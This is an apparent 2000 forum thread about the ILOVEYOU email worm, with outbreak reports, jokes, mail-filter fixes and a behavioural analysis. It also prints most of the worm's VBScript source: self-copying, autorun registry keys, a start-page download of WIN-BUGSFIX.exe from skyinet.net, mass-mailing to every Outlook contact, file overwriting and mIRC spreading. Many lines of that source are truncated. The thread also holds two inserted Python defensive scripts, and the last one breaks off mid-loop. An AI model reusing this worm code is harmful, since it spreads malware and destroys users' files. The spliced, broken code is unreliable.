I Love You "Virus" Hates Everyone
Loquis was the first of seven billion readers to submit this story about the I Love You Virus and the UK. It's not really a virus: it's a trojan that proclaims its love for the recipient and requests that you open its attachment. On a first date even! It then loves you so much that it sends copies of itself to everyone in your addressbook (slut!) and starts destroying files on your drive. Course they estimate that it's infected 10% of the UK. Pine/Elm/Mutt users as always laugh maniacally as the trojan shuffles countless wasted packets over saturated backbones filling overworked SMTP servers everywhere. Sysadmins are seen weeping in the alleys.
Update: 05/04 03:12 by CT : My Roommate Kurt "The Pope" DeMaagd has written a better summary of the trojan and more importantly a HOWTO fix it. Windows users only ;) Requires registry hacking, so it's not for everyone.
We've got to come up with another venue for the kiddies to get their fame. Maybe we can bring back graffiti.
--- Submission is feudal.
From reports that are coming in it looks like it started somewhere in Asia and then moved into Europe. A lot of ISPs in South Africa have also been badly affected.
OK - I suppose it's wishful thinking to hope that users would realize by now not to open e-mail attachments they know nothing about...
I have Outlook 2000 open as we speak.
So far, I've received (estimated) about fifty copies of the damn thing. It's funny, in a "well, hey, look - a train wreck" sort of way.
The email servers where I work have been shut down due to this nasty bugger. It came in over our WAN from Germany and the UK sometime around 3AM.
Guess it will be a quiet day today!
They would be better off calling these viruses "Mixed emotions".. perhaps our Linux team thought it was funny, but our NT team did not. ;-)
We thought it was weird, but it wouldn't run on most of my colleagues' machines anyway - so I opened it using a text editor, and it's written in plain, unobfuscated text.
Lines like spread(email) are kinda obvious.
Still, the first guy who got it was distraught that she didn't love him after all:)
But the number of "If you get an email that says 'I love you', DON'T OPEN IT!" messages are getting a bit annoying.
It is already in FL and making its way through the government address books which are not small by any measure.
Life's like that
...for this sort of thing, if you know what I mean...
DrLunch.com The site that tells you what's for lunch!
What's this "Weaping" business? Is it some sort of Elmer Fudd-ism? It's WEEPING. Buy a spell checker.
This is
What the heck do I care, but it pisses me off to see that some people even at my work place can be disturbed by this. Internally we're an AIX house, for God's sake!
I think, therefore thoughts exist. Ego is just an impression.
As far as I know, the virus started out in Asia (somewhere) and made its way to Europe and now the US (including many military installations as well).
Sites I've found that offer disinfectants are a post on ZDNet http://www.zdnet.com/tlkbck/comment/22/0,7056,88754-421758,00.html, as well as http://www.f-source.com
good luck people
It's not just the UK that's getting hit hard. Things here in northern Indiana are very ugly this morning.
Hey! Those of us who use messenger are not immune to this as well. I have received about 10 copies of it this morning.. And the IT folks want to know why I don't want to use Outlook......
Our company was just hit by this - one NT server and two workstations down.. it deletes and renames files like there's no tomorrow.
UNIX would not have a problem here..
Maybe in the long run though - but at least a virus would "only" be able to do what the user can do - not nuke the system.
People still have to be dumb enough to open the attachment.
-- jaf
The nice thing about viruses like this is you find out about people you never met who have you in their address book....at least in my case. -Pete
Soccer Goal Plans
We've got a copy of it here, but it was caught by an on-the-ball employee that received it, and forwarded it to the IT department...
At the lab I'm working as a system administrator, we're jumping with joy as we see the number of companies that suffer from this virus grow. We're using iMacs, OS X server Macs, and suns running Solaris boxes, and everything is perfectly all right here :-))
Anyway, I read this over on OSOpinion ... but could MS's implanting of Outlook in nearly everything actually be more damaging than their inclusion of IE in DOS?
This is the second time in a couple of months that I've been at a company where this sort of thing has gone around and around. Companies really need to be aware of the consequences of using Outlook and Exchange. This does not happen when you are using Sendmail and a regular POP3 or IMAP client.
The difference between Canada and the USA is that in Canada healthcare is a right and gun ownership is a privilege.
Now I have to tell my girlfriend to delete all my old e-mails, because they had that subject line, and you never know!
Got Rhinos?
header_checks = regexp:/etc/postfix/header_checks
Add the following line in /etc/postfix/header_checks:
This will reject mails containing this subject.
Thanks to Claus Guttesen who posted this on the postfix mailing list.
It's a very nasty trojan, especially because it starts automatically after a reboot. To be sure what it does and doesn't, look at: ftp://weazel.student.utwente.nl/pub/mailworm.txt
Things have been fairly cool here (r&d for telecoms). They reckon it came from the Philippines, for some reason.
I got it without an attachment, and emailed the woman back 'I'm mortified that you didn't include the letter'.
I'm not sure whether I feel like an idiot or what!
thenerd.
The camels are coming. I'm in love.
I never saw Melissa, but I did get three copies of ILOVEYOU thanks to the corporate-wide mailing list. That was this morning. Since then, our mailadmins have done an admirable job, and I've seen none. I'm glad somebody took Melissa as a wake-up call.
..as it is sooo easy to access the windows address book and Exchange from a program without even needing a password. I'm not sure how this one worked as our mail has been shut down and therefore I can't get a copy, but for there to be no need for permissions (at least, this is the case on NT) is ridiculous.
Got a beef? Plug a name into the Bizarre Rumour Generator!
This analysis I did this morning in a rush when one of our HR girls ran it. It's a VBS worm. It spreads by two methods, irc and email.

On startup it sets the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout to 0.

It then copies itself to
WINNT/SYSTEM32/MSKernel32.vbs
WINNT/Win32DLL.vbs
WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.TXT

It then creates registry keys
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
which will run the script again on the next boot of the computer.

Next it checks to see if the IE download directory is set in the registry - if it is it remembers that value, otherwise it uses c:\ instead. It then checks to see if /WINNT/SYSTEM32/WInFAT32.exe exists - if it does it sets Internet Explorer's start page to download a file called WIN-BUGSFIX.exe from one of 4 places (randomly chosen) on www.skyinet.net. It then checks to see if this file has been downloaded (i.e. when the script is run at a later date). If it has, it sets this .exe to be run at next boot and resets the IE home page to about:blank (blank page).

Next, it generates the file WINNT/SYSTEM32/LOVE-LETTER-FOR-YOU.HTM. This basically contains the worm itself set to run when the page is viewed. Now it does the old trick of opening the Outlook address book, grabbing *all* the entries in it and emailing them an email with the subject line "ILOVEYOU" and the worm as an attachment.

Now it has a look around all the drives on the machine (local drives I think) and does the following:
a) If it finds mirc, edits its ini file so when you next log onto an irc channel it dcc's itself to all the other users
b) Overwrites any .vbs and .vbe files it finds with itself
c) If it finds any vbs, vbe, css, wsh, sct or hta files it deletes them, creates a new file with the same name ending in vbs and copies itself to it
d) Does similar things to (c) to .mp3, .mp2, .jpg, .jpeg

Then the script ends.
Stuart
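The indicators named in the analysis above, turned into a triage check over a registry export and a file listing. This is an added example, not part of the comment or of the script posted in this thread; the function names and the sample data are constructed, the listing is assumed to include hidden files, and the recoverable/overwritten split follows the infectfiles routine in the script posted further down the page (music files are hidden beside a .vbs copy, pictures are overwritten and deleted).

```python
import re

# File names taken from the analysis and the posted script on this page.
DROPPED = {"mskernel32.vbs", "win32dll.vbs", "love-letter-for-you.txt.vbs",
           "love-letter-for-you.htm", "winfat32.exe", "win-bugsfix.exe"}
RUN_KEY = re.compile(r"\\windows\\currentversion\\run(services)?$", re.I)
IE_MAIN = "\\internet explorer\\main"


def leaf_of(path):
    """Last path component, lower-cased, for Windows paths and URLs."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_reg(text):
    """Yield (key, value_name, data) from .reg-style export text."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif key and line.startswith('"') and '"=' in line:
            name, data = line[1:].split('"=', 1)
            # String data is quoted and has doubled backslashes in exports.
            yield key, name, data.strip('"').replace("\\\\", "\\")


def registry_findings(text):
    hits = []
    for key, name, data in parse_reg(text):
        k = key.lower()
        leaf = leaf_of(data)
        if RUN_KEY.search(k) and (leaf in DROPPED or leaf.endswith(".vbs")):
            hits.append(f"autorun {name} -> {data}")
        elif (k.endswith(IE_MAIN) and name.lower() == "start page"
              and "win-bugsfix.exe" in data.lower()):
            hits.append(f"IE start page -> {data}")
    return hits


def file_findings(paths):
    """Sort a listing into dropped copies, recoverable and lost originals."""
    present = {p.lower() for p in paths}
    found = {"dropped": [], "recoverable": [], "overwritten": []}
    for p in paths:
        low = p.lower()
        if leaf_of(p) in DROPPED:
            found["dropped"].append(p)
        elif low.endswith(".vbs"):
            original = low[:-4]
            if original.endswith((".mp3", ".mp2")) and original in present:
                # Original was only hidden; clear the attribute to restore.
                found["recoverable"].append(p[:-4])
            elif original.endswith((".jpg", ".jpeg")) and original not in present:
                # Original was overwritten and deleted; restore from backup.
                found["overwritten"].append(p[:-4])
    return found


# Constructed sample data (the start-page URL is a placeholder).
SAMPLE_REG = r'''
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"MSKernel32"="C:\\WINNT\\SYSTEM32\\MSKernel32.vbs"
"Antivirus"="C:\\Program Files\\AV\\avtray.exe"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
"Win32DLL"="C:\\WINNT\\Win32DLL.vbs"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://example.invalid/WIN-BUGSFIX.exe"
'''

SAMPLE_FILES = [
    r"C:\WINNT\SYSTEM32\MSKernel32.vbs",
    r"C:\WINNT\Win32DLL.vbs",
    r"C:\WINNT\SYSTEM32\LOVE-LETTER-FOR-YOU.TXT.vbs",
    r"C:\Music\track01.mp3",
    r"C:\Music\track01.mp3.vbs",
    r"C:\Photos\beach.jpg.vbs",
    r"C:\Photos\cat.jpg",
    r"C:\Scripts\backup.vbs",
]

if __name__ == "__main__":
    for hit in registry_findings(SAMPLE_REG):
        print("REG ", hit)
    for kind, items in file_findings(SAMPLE_FILES).items():
        for item in items:
            print(kind.upper(), item)
```

A pre-existing .vbs such as the sample's backup.vbs is not classified: the listing alone cannot show whether its contents were replaced, so such files need a content check.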
I wake up this morning, check /. as usual and see this story. About 5mins after seeing the story and chuckling to myself about the entire idea of virii, guess what appeared in my inbox.. Yup A copy of this trojan for my very own ;)
That's ok! Reading the email is ok, it is running the attachment that is bad! You didn't do anything
Poor old House of Commons. Seems our beloved democracy has been brought to its knees by this one.
It mails to everyone in your Outlook addressbook, not just 50. Also your MIRC nick list. It trawls all your mounted directories copying itself over all MP3's JPEGS .jpgs, style sheets and .js files amongst others
This actually managed to knock out half of our office, as well as render one of our live web servers pretty messed up, within under 10 minutes of the first person activating it. Yes, the webserver was a linux box, but one unfortunate had a subtree on a server that mirrored stuff to it mounted over a samba share
And no, you didn't have to click on it. That damn preview pane was enough to trigger it off.
-- Oh Well
Would you like to date a guy who is called "Dow" ? D'oh, I'll say.
Either that, or people need to stop using the address books, which are for lusers anyway! :o)
Got Rhinos?
My job's sysadmin has already warned us that the virus was in the wild somewhere, and has asked us *not* to open anything suspicious.
I know that several large firms in my area are also scrambling to stop the infection. This virus can stop any MS system dead in its tracks and clog the others beyond repair. Tough little one!
The right to offend is far more important than the right not to be offended. (Rowan Atkinson)
Dutch news has that some 10% of bigger companies have shut down their email systems as a result of the "I LOVE YOU" virus already. It is on the radio news right now, as the first item.
.MP2 .MP3 .CSS .HTML and .JPG files, and renames them to .VBS files!
If you have a chance, take a look at the virus code, and see what some 300 lines of visual basic can cost industry in say a 24 hour period.
In fact, as I write this, a guy from our support department comes in and hands me a printed "Virus Alert" piece of paper! It says the virus sends itself to all addresses in your address book. Having looked at the code, the virus also checks if you run an IRC client, and sends itself to everyone in all channels you are in.
The virus also changes all
Hmmm... there seems to be some really bored kid out there somewhere... the first line of the virus script reads:
rem barok -loveletter(vbe)
Ron Sprenkels (sprenkel@cs.utwente.nl)
From my initial investigation it looks like it is totally MS Specific. So own up then how many /. readers have been kicked in the balls? Come out of the closet all of you!
I LOVE YOU (sorry, couldn't resist)
This virus follows the same pattern of "send to everyone in the address book", but ALSO appends the sender's name to a data file included with the virus.
The recipient then falls into one of three classes:
1) Can't get/read virus.
2) Can get/read virus and gets stung (and appended to list).
3) Can get/read virus, doesn't get stung, received handy list of idiot coworkers.
This list can be used in a multitude of ways:
1) Reduce headcount
2) List of gullible fools who will buy $2 candy bars "to send the Girl Scouts to the Moon"
3) Identify users who need "training" (sit in a small hot room with each other and an instructor who does nothing but taunt them for their hunt-n-pecking)
--
Have Exchange users? Want to run Linux? Can't afford OpenMail?
Linux MAPI Server!
http://www.openone.com/software/MailOne/
(Exchange Migration HOWTO coming soon)
The only love letter I've ever gotten... and I can't open it....
Ceci n'est pas une sig.
What worries me, and I like to have this explained, is why people continue to use Outlook.
First it was Melissa, now it is ILOVEYOU.. you would think that someone would wake up and do something constructive such as switching to a mail program that would and could not be affected.
I've tried to reason with our NT users, telling them that we got away these two times but that the next time (because there will be a next time I'm afraid) we might not be so lucky. Are there any worthy alternatives to Outlook? [worthy enough to convince the NT group.. you know how stubborn they are.. they're almost zealots like us ;-)]
My college email comes through an Outlook web server (right here, if you're interested) and I'm wondering if I've got anything to worry about. I've tried to get the bloody admins to allow POP email clients to work with the college's system, but the morons don't know how to do it.
Outlook web admins, should I be worried at all?
Maybe in a few weeks, we will have a different worm (a small variation) saying "ILOVEYOUTOO" :)
-- jaf
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Mic
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs"
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Mic
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerh
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflf
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGR
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklN
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cu
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eqfolderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1=
scriptini.WriteLine "n2=
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,reg
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Softwar
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Softwa
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FO
male.Send
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malea
end if
x=x+1
next
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.A
else
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.A
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="LOVELETTER - HTML"&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
"
This HTML file need ActiveX Control
To Enable to read this HTML file
- Please press #-#YES#-# button to Enable ActiveX"&vbcrlf& _
"----------z--------------------z---------- "&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""&vbcrlf& _
""
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\")
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'")
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""")
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/")
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\")
set fso=CreateObject("Scripting.FileSystemObject")
set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=ubound(lines)
for n=0 to ubound(lines)
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+c
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+c
if (l1=n) then
lines(n)=chr(34)+lines(n)+chr(34)
else
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _"
end if
next
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-
b.close
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YO
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.close
end sub
These kinds of viruses will continue to proliferate and cause massive disruptions and cost huge amounts of money until several large corporations get together and sue Microsoft (or other mail program manufacturers) for negligence and demand the companies selling the faulty programs pay for the costs.
The dangers of allowing running of attached programs automatically or even easily is guaranteed to cause just this problem. It will happen. It will be repeated. On a yearly basis now, perhaps, but more likely on a monthly or weekly basis in the future. The _only_ way to stop it from happening is to stop the mail program creators from _having_ these 'features'.
Stop being so arrogant. It's just an executable attachment.
For a linux version just write a bash script that'll read the user's address book and send it on as well.
This is one reason NOT to want world domination. In that case it'll spread easily
------------------------------------------------ -
"If I can shoot rabbits then I can shoot fascists" -
Here at Xerox we're getting pounded ... people are such IDIOTS!
I am, therefore you think.
-d, laughing with the rest of the Linux users
www.HearMySoulSpeak.com
http://www.heise.de Site is in German, You may want to use this little fish
"Beware of he who would deny you access to information, for in his heart he dreams himself your master."
"Who needs Outlook, when Outlook can be broken?"
{ducks}
Hrm. How many kids have ever been famous (as youngsters), historically? And would worms be reduced if the actors were *never* mentioned in press, and were basically guaranteed no fame except perhaps in their local justice system?
Only the dead have seen the end of war.
Early this morning, in response to the virus, the AP had the following report about Microsoft:
--
SEATTLE (AP) -- In response to the "ILOVEYOU" virus, Microsoft has announced that they are changing the name of their popular e-mail program to "Microsoft Lookout!"
"Really, what else could we do?" said Steve Ballmer, president of Microsoft. "I mean, first the Melissa virus, and then this. Sure, we probably should plug these security holes in Outlook -- whoops, make that Lookout! -- but we felt the name change was the most proactive step we could take short of releasing better programs."
"At least the virus didn't say 'BILLGATESLOVEYOU'," he added. "Geez, that could've been bad."
--
Sargent
One of my coworkers just walked in my office, saying 'what are .vbs documents' ?
So I looked at it, seeing the obvious VB virus in it.
Thankfully, the OS this guy uses is OPENSTEP42. Two minutes later, I received it (via gnustep discussion list). Happily, I run Mac OS X Server.
Cheers,
--fred
I can't wait to see traditional media respond to this. "A horrible virus from that insidious Internet thing is out there looking for your children! Details later after some other inane news."
This is an Outlook trojan. Shocker.
I'm sure M$ will deny that it even exists, talk about dark hearted hackers...then not bother to fix the bug...I'm sorry, feature that allows it to do this.
SO glad I use Eudora and Pine.
In space, no one can hear you moo.
From the MSNBC article:
"It crashed all the computers," said Daphne Ghesquiere, a Dow Jones spokeswoman in Hong Kong. "You get the message and the topic says ILOVEYOU, and I was among the stupid ones to open it. I got about five at one time and I was suspicious, but one was from Dow Jones Newswires, so I opened it."
Once the message was opened, Ghesquiere said, it began sending the virus to other e-mail addresses within the Dow Jones computers, blocking people's ability to send and receive e-mail. Victims sometimes received dozens of e-mails, all contaminated.
"I have no idea how it got through the firewall," Ghesquiere said. "It's supposed to be protected." (emphasis mine)
The article even has a screen shot of the oh-so-unsuspicious attachment: "LOVE-LETTER-FOR-YOU.TXT.vbs".
Now, I'm generally all for grandmothers sending email and not-everyone-should-have-to-be-able-to-configure-X11-to-use-the-Internet and all of that, but shouldn't there be a law against letting people this ignorant operate important computers in financial institutions??
I mean, I'm joking of course.
Or at least I think I'm joking...
My office got it this morning.
Of course the "IT staff" referred to it as a "hacker attack" *sigh* Without fail I look in my inbox every time these e-mail "viruses" hit and I'm disappointed with the # of cow-workers whom I communicate with who seemed fairly intelligent to me, up until this very point.
It doesn't only send itself via email to everyone on your list, it also (if you use mIRC) sends it to others using DCC. It wipes out files with the following extensions: MP3, MP2, CSS, HTML, JPG, JPEG, JSE, WSH, JS, SCT, HTA, and VBS (may have forgotten some). It'll muck about in your registry. It's not only in the UK... it's sweeping across the continent as people are logging in and reading their email. Apparently it originated from Manila, the Philippines (or so it says in the script itself), but this may be someone who is making someone else look bad (the email address in the script says: ispyder@mail.com). It also tries to download an executable (1 of 4 different, random executables). It changes IE's Start Page.
:-) ... Makes me all the more happy I don't use Windows.
This is someone with a serious grudge against people who use Microsoft mail programs.
There's a VBS script I saw to fix most of the damage in the registry, but it looks like the site I got it from has been slashdotted, and I don't have the necessary bandwidth to mirror it (or the original script, which I have too). Email me if you do.
Cheers!
Costyn.
The Official Steve Ballmer Webpage
This is just natural selection in action. People smart enough to use anything but Windoze aren't affected by it, except for mailbox clutter. People who avoid contact with Outlook users aren't affected by it. People who use Windoze and Outlook but are smart enough not to put anything in the hackable-as-hell address book aren't propagating it. People who don't open e-mail attachments without a thought aren't propagating it. Those who have sold their souls (and systems) to Microsoft get screwed by it. Now who can tell me what the moral of this story is?
Bugrit! Millenium hand and shrimp!
rem barok -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / Manila,Philippines
The Cure of the ills of Democracy is more Democracy.
Erlang Developer and podcaster
I received a copy, but our sysadmins have a virus filter built in to the mail server, so the attachment was purged.
That should be the standard approach at any site that runs Windows.
1) It's an executable attachment (.vbs - Doh!)
2) It came from a complete stranger
no.1 was enough though
I was too curious though - had to have a look with Notepad
------------------------------------------------ -
"If I can shoot rabbits then I can shoot fascists" -
So, while I'm feeling all clever running Solaris and not Windows, POP servers everywhere are getting a sort of lovechild effect and getting a second battering!
Wouldn't you think that by now the media would have mentioned something about the evils of VB?
Luckily, I came into the office late today and everyone here is scrambling to "repair" their system.
-- ladies and gentlemen we are floating in space!
The company I work for (BaaN) suffered from the trojan as well. The email network is down (Exchange) as I type. The problem here: everybody uses one shared addressbook with over 4000 (!!) mail addresses. You can imagine what happens if the trojan gets hold of this ...
.... *grin*
Most of the correspondence goes through email around here (because we have departments all over the world) so you can imagine the damage.
And people ask me why I always ssh to my server to start pine
--
If code was hard to write, it should be hard to read
You can talk all you like about sites being slashdotted, but just try connecting to http://www.skyinet.net/ ;-)
~~~~~ BigLig2? You mean there's another one of me?
To get rid of macro virus "ILOVEYOU". This only works if you haven't gotten to get that bugfix file that set the default IE page.
Go to start menu, find files or folders, make sure checkbox for include subfolders is checked, look for *.vbs.
Once search is complete highlight all files (shift-downarrow), then hit shift-del, say yes to all if prompted.
Go to settings, control panel, internet options, set homepage to use blank.
Shutdown and reboot.
It also tries to dcc an executable if you have mirc.
Listen, how many email virus outbreaks will it take before people get the clue. If you get five emails with the same subject from people who do NOT love you then don't open the crap it is a virus or useless spam!
It is amazing that someone sits around and takes the time to start this nonsense anyway. God, I hate Outlook and Neanderthal technology it runs on. Still, driving innocent sysadmins insane is not the answer people.
ACK
Well, to solve this problem I installed some procmail scripts on the server that simply don't allow executable files through the mail system.
they have to at least archive them first and that will prevent 99% of these sort of nasty viruses from hitting my network.
I've already gotten five notifications that this file has been blocked.
using a virus scanner isn't good enough, because all the nastiest ones spread too quickly for the updates to matter (hence all these idiots this time with "we have a virus protection, gee why didn't it work?")
educating users is absolutely stupid, it will never work, but that is the typical windows way: blame it on the "dumb users" (and they call us nix types elitist. Bah.)
support gun control: take guns from cops
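A gateway check in the spirit of the Postfix subject rule and the procmail filter described in this thread, as an added example (not either poster's configuration). It is written in Python with hypothetical function names and constructed sample messages, and shows why a subject match alone is brittle while an attachment-extension rule still catches a copy with a changed subject; the extension list is the script types named on this page plus .exe.

```python
import email
from email import policy
from email.message import EmailMessage

# Script/executable types named in this thread, plus .exe.
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsh", ".sct", ".hta", ".exe"}
# Harmless-looking extensions used as a decoy in front of the real one.
DECOY_EXTS = {".txt", ".jpg", ".jpeg", ".mp3", ".mp2", ".htm", ".html", ".doc"}


def extensions(filename):
    """All dotted suffixes of a file name, normalised.

    Trailing dots and spaces are dropped first, since Windows ignores
    them when the file is saved and opened.
    """
    name = filename.strip().rstrip(". ").lower()
    return ["." + part for part in name.split(".")[1:]]


def inspect(raw):
    """Return (verdict, reasons) for one raw RFC 822 message."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    reasons = []
    subject = str(msg.get("Subject", "")).strip()
    if subject.upper() == "ILOVEYOU":
        reasons.append("subject rule")
    for part in msg.walk():
        # get_filename() reads Content-Disposition and falls back to the
        # Content-Type "name" parameter.
        fname = part.get_filename()
        if not fname:
            continue
        exts = extensions(fname)
        if exts and exts[-1] in SCRIPT_EXTS:
            double = len(exts) > 1 and exts[-2] in DECOY_EXTS
            kind = "double extension" if double else "script attachment"
            reasons.append(f"{kind}: {fname}")
    return ("REJECT" if reasons else "ACCEPT"), reasons


def build(subject, filename=None):
    """Construct a sample message; the attachment body is a placeholder."""
    m = EmailMessage()
    m["From"] = "sender@example.invalid"
    m["To"] = "rcpt@example.invalid"
    m["Subject"] = subject
    m.set_content("kindly check the attached LOVELETTER coming from me.")
    if filename:
        m.add_attachment(b"placeholder bytes", maintype="application",
                         subtype="octet-stream", filename=filename)
    return m.as_bytes()


# Constructed samples, not captured traffic.
SAMPLES = {
    "original": build("ILOVEYOU", "LOVE-LETTER-FOR-YOU.TXT.vbs"),
    "renamed_subject": build("ILOVEYOUTOO", "Photo.JPG.VBS"),
    "no_attachment": build("ILOVEYOU"),
    "benign": build("lunch", "menu.txt"),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
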